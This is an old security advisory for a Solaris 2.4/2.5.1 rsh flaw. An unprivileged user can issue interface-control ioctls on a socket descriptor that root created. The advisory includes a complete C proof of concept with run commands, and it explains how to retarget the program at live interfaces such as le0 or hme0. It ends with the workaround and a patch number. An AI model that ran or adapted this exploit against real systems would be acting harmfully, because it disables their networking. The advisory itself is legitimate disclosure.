COMMAND

    rsh

SYSTEMS AFFECTED

    Solaris 2.4, 2.5.1

PROBLEM

    The following is rsh exploit by Alan Cox.

	cc solarisuck.c -o solarisuck -lsocket
	rsh localhost ./solarisuck

	------------
	solarisuck.c
	------------
	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <sys/sockio.h>
	#include <net/if.h>
	#include <netinet/in.h>


	int main(int argc, char *argv[])
	{
		struct ifreq please_break_me;

		strcpy( please_break_me.ifr_name, "lo0");
		please_break_me.ifr_flags=0;

		if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
			perror("Damn it didnt work. Obviously not Solaris ;)");
	}

    You can adjust this to do other things. Basically any user can  do
    network control requests on a root created socket descriptor.

    If you  change the  "lo0" to  "le0" or  "hme0" (depending  on your
    interface names) it will work like a charm.  This also works  with
    rexecd.

SOLUTION

    Disable rsh  and any  non root  owned inetd  tasks - breaks remote
    tar etc.  This appears to be fixed in 2.6 at any rate..
    Patch 103093-13 (Solaris 2.5  SPARC) claims to fix  (among others)
    the following problem:

        1238582 privileged ifconfig ioctls  by normal user succeed  on
                sockets created as root